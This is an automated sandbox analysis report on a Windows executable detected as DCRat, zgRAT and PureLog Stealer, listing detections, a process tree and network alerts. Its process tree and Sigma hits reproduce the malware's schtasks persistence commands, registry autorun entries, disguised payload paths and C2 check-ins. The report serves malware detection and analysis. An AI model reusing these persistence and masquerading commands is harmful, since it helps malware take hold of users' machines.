Edit tour

Windows Analysis Report
yX8787W7de.exe

Overview

General Information

Sample name:	yX8787W7de.exe renamed because original name is a hash value
Original sample name:	10f54a1a68bce057dc9abbc2851a6235.exe
Analysis ID:	1431967
MD5:	10f54a1a68bce057dc9abbc2851a6235
SHA1:	aa70b6be5f6e35655d0a5e25c450b47f4a23ffd0
SHA256:	d0be212a60bf7479492be23497cf0e933b8c6fda4e68b0d9724c7dc18e30fa37
Tags:	DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Snort IDS alert for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

Creates an undocumented autostart registry key

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates multiple autostart registry keys

Creates processes via WMI

Drops executable to a common third party application directory

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Allocates memory with a write watch (potentially for evading sandboxes)

Compiles C# or VB.Net code

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

yX8787W7de.exe (PID: 6596 cmdline: "C:\Users\user\Desktop\yX8787W7de.exe" MD5: 10F54A1A68BCE057DC9ABBC2851A6235)

wscript.exe (PID: 1832 cmdline: "C:\Windows\System32\WScript.exe" "C:\fontrefcrt\JfSdr.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 3744 cmdline: C:\Windows\system32\cmd.exe /c ""C:\fontrefcrt\YPm3Ri0zuGSw0d5cA9MOsCVgRsbtCEjXWkwqUVDQU6Ex.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MsintoRefcommonsvc.exe (PID: 5340 cmdline: "C:\fontrefcrt/MsintoRefcommonsvc.exe" MD5: 65F6B916C8BD52DDAD601807F96BC373)

schtasks.exe (PID: 6980 cmdline: schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 6 /tr "'C:\Recovery\SystemSettings.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2304 cmdline: schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6576 cmdline: schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 14 /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

csc.exe (PID: 3652 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 6324 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4FAE.tmp" "c:\Windows\System32\CSCE4B7E694399A43119EA8A93F1E7760F4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

schtasks.exe (PID: 1832 cmdline: schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsYS" /sc MINUTE /mo 9 /tr "'C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1780 cmdline: schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsY" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5820 cmdline: schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsYS" /sc MINUTE /mo 7 /tr "'C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7100 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4420 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

Conhost.exe (PID: 6980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6308 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 928 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\fontrefcrt\WmiPrvSE.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5852 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\fontrefcrt\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1984 cmdline: schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\fontrefcrt\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2304 cmdline: schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsYS" /sc MINUTE /mo 10 /tr "'C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7100 cmdline: schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsY" /sc ONLOGON /tr "'C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2672 cmdline: schtasks.exe /create /tn "SwjJGfgwqbpLdPqvPFcqLsYS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 928 cmdline: schtasks.exe /create /tn "MsintoRefcommonsvcM" /sc MINUTE /mo 11 /tr "'C:\fontrefcrt\MsintoRefcommonsvc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6980 cmdline: schtasks.exe /create /tn "MsintoRefcommonsvc" /sc ONLOGON /tr "'C:\fontrefcrt\MsintoRefcommonsvc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2304 cmdline: schtasks.exe /create /tn "MsintoRefcommonsvcM" /sc MINUTE /mo 14 /tr "'C:\fontrefcrt\MsintoRefcommonsvc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 3652 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wNNbKC3aho.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6712 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 2304 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

conhost.exe (PID: 7184 cmdline: "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe" MD5: 65F6B916C8BD52DDAD601807F96BC373)

cmd.exe (PID: 7600 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7688 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 7704 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

conhost.exe (PID: 7200 cmdline: "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe" MD5: 65F6B916C8BD52DDAD601807F96BC373)

MsintoRefcommonsvc.exe (PID: 7224 cmdline: C:\fontrefcrt\MsintoRefcommonsvc.exe MD5: 65F6B916C8BD52DDAD601807F96BC373)

MsintoRefcommonsvc.exe (PID: 7240 cmdline: C:\fontrefcrt\MsintoRefcommonsvc.exe MD5: 65F6B916C8BD52DDAD601807F96BC373)

SwjJGfgwqbpLdPqvPFcqLsY.exe (PID: 7260 cmdline: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe MD5: 65F6B916C8BD52DDAD601807F96BC373)

Conhost.exe (PID: 2848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SwjJGfgwqbpLdPqvPFcqLsY.exe (PID: 7284 cmdline: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe MD5: 65F6B916C8BD52DDAD601807F96BC373)

conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
yX8787W7de.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
yX8787W7de.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\fontrefcrt\WmiPrvSE.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\fontrefcrt\WmiPrvSE.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\SystemSettings.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\SystemSettings.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\fontrefcrt\MsintoRefcommonsvc.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\fontrefcrt\MsintoRefcommonsvc.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1640565455.0000000006B27000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.1639922058.0000000006213000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000000.1847919566.00000000009B2000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.1641053706.0000000006B25000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.1889075277.00000000130A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: MsintoRefcommonsvc.exe PID: 5340	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: conhost.exe PID: 7184	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: SwjJGfgwqbpLdPqvPFcqLsY.exe PID: 7260	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
5.0.MsintoRefcommonsvc.exe.9b0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.0.MsintoRefcommonsvc.exe.9b0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.yX8787W7de.exe.62616d2.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.yX8787W7de.exe.62616d2.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.yX8787W7de.exe.62616d2.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.yX8787W7de.exe.62616d2.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.yX8787W7de.exe.6b756d2.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.yX8787W7de.exe.6b756d2.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.yX8787W7de.exe.6b756d2.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.yX8787W7de.exe.6b756d2.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\fontrefcrt\MsintoRefcommonsvc.exe, ProcessId: 5340, TargetFilename: C:\fontrefcrt\WmiPrvSE.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe", CommandLine: "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe, NewProcessName: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe, OriginalFileName: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe", ProcessId: 7184, ProcessName: conhost.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Recovery\SystemSettings.exe", EventID: 13, EventType: SetValue, Image: C:\fontrefcrt\MsintoRefcommonsvc.exe, ProcessId: 5340, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemSettings

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Recovery\SystemSettings.exe", EventID: 13, EventType: SetValue, Image: C:\fontrefcrt\MsintoRefcommonsvc.exe, ProcessId: 5340, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\fontrefcrt/MsintoRefcommonsvc.exe", ParentImage: C:\fontrefcrt\MsintoRefcommonsvc.exe, ParentProcessId: 5340, ParentProcessName: MsintoRefcommonsvc.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline", ProcessId: 3652, ProcessName: csc.exe

Sigma detected: Suspicious Powershell In Registry Run Keys

Source: Registry Key set

Author: frack113, Florian Roth (Nextron Systems): Data: Details: "C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe", EventID: 13, EventType: SetValue, Image: C:\fontrefcrt\MsintoRefcommonsvc.exe, ProcessId: 5340, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\fontrefcrt\JfSdr.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\fontrefcrt\JfSdr.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\yX8787W7de.exe", ParentImage: C:\Users\user\Desktop\yX8787W7de.exe, ParentProcessId: 6596, ParentProcessName: yX8787W7de.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\fontrefcrt\JfSdr.vbe" , ProcessId: 1832, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\fontrefcrt\MsintoRefcommonsvc.exe, ProcessId: 5340, TargetFilename: C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\fontrefcrt/MsintoRefcommonsvc.exe", ParentImage: C:\fontrefcrt\MsintoRefcommonsvc.exe, ParentProcessId: 5340, ParentProcessName: MsintoRefcommonsvc.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i0e0ny4g\i0e0ny4g.cmdline", ProcessId: 3652, ProcessName: csc.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe'" /f, CommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\fontrefcrt/MsintoRefcommonsvc.exe", ParentImage: C:\fontrefcrt\MsintoRefcommonsvc.exe, ParentProcessId: 5340, ParentProcessName: MsintoRefcommonsvc.exe, ProcessCommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windowspowershell\Configuration\Schema\conhost.exe'" /f, ProcessId: 7100, ProcessName: schtasks.exe

Snort Signatures

ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.4 - Destination IP: 104.21.16.102

Timestamp:	04/26/24-05:18:06.649964
SID:	2048095
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.4 - Destination IP: 104.21.16.102

Timestamp:	04/26/24-05:17:55.506360
SID:	2048095
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.4 - Destination IP: 104.21.16.102

Timestamp:	04/26/24-05:18:16.044779
SID:	2048095
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.4 - Destination IP: 104.21.16.102

Timestamp:	04/26/24-05:18:58.981677
SID:	2048095
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.4 - Destination IP: 104.21.16.102

Timestamp:	04/26/24-05:18:22.668854
SID:	2048095
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.4 - Destination IP: 104.21.16.102

Timestamp:	04/26/24-05:18:13.157896
SID:	2048095
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.4 - Destination IP: 104.21.16.102

Timestamp:	04/26/24-05:17:25.838542
SID:	2048095
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.4 - Destination IP: 104.21.16.102

Timestamp:	04/26/24-05:18:04.927388
SID:	2048095
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.4 - Destination IP: 104.21.16.102

Timestamp:	04/26/24-05:18:17.813793
SID:	2048095
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.4 - Destination IP: 104.21.16.102

Timestamp:	04/26/24-05:18:49.422994
SID:	2048095
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: yX8787W7de.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Recovery\SystemSettings.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\fontrefcrt\WmiPrvSE.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\wNNbKC3aho.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\fontrefcrt\JfSdr.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\fontrefcrt\MsintoRefcommonsvc.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat	Avira: detection malicious, Label: BAT/Delbat.C

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\conhost.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files\Internet Explorer\en-US\SwjJGfgwqbpLdPqvPFcqLsY.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	ReversingLabs: Detection: 83%
Source: C:\Recovery\SwjJGfgwqbpLdPqvPFcqLsY.exe	Virustotal: Detection: 73%	Perma Link
Source: C:\Recovery\SystemSettings.exe	ReversingLabs: Detection: 83%
